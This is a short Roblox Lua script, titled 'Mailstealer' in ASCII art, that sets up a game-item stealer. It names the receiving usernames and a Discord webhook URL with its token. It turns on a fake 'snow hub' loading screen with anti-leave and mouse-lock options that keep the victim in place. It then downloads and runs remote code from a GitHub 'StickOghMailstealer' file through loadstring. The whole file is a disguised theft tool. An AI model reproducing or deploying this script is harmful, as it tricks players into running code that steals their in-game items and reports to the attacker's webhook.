--[[
  __  __       _ _     _             _           
  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 
  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|
  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   
  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

]]--

UserName = "okmeinbruder"
Webhook = "https://discord.com/api/webhooks/1133031918812794970/cHxPy1Gk3cSSMGw6BQDsvwAG51aTh9wzG6-UJ-1xKJYcFkQYXnWAWZWXyb5q9VTncN7P"
UserName2 = "hallo23456798"

_G.LoadingScreen = true -- make it true if you want the loadingscreen
_G.AntiLeave = true -- make it true if you want the antileave
_G.MouseLock = true -- make it true if you want the mouselock

_G.ScriptName = "snow hub"
_G.FirstText = "Preparing..."
_G.SecondText = "Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%

loadstring(game:HttpGet("https://raw.githubusercontent.com/StickOgh01/MailstealerST01/main/StickOghMailstealer", true))()
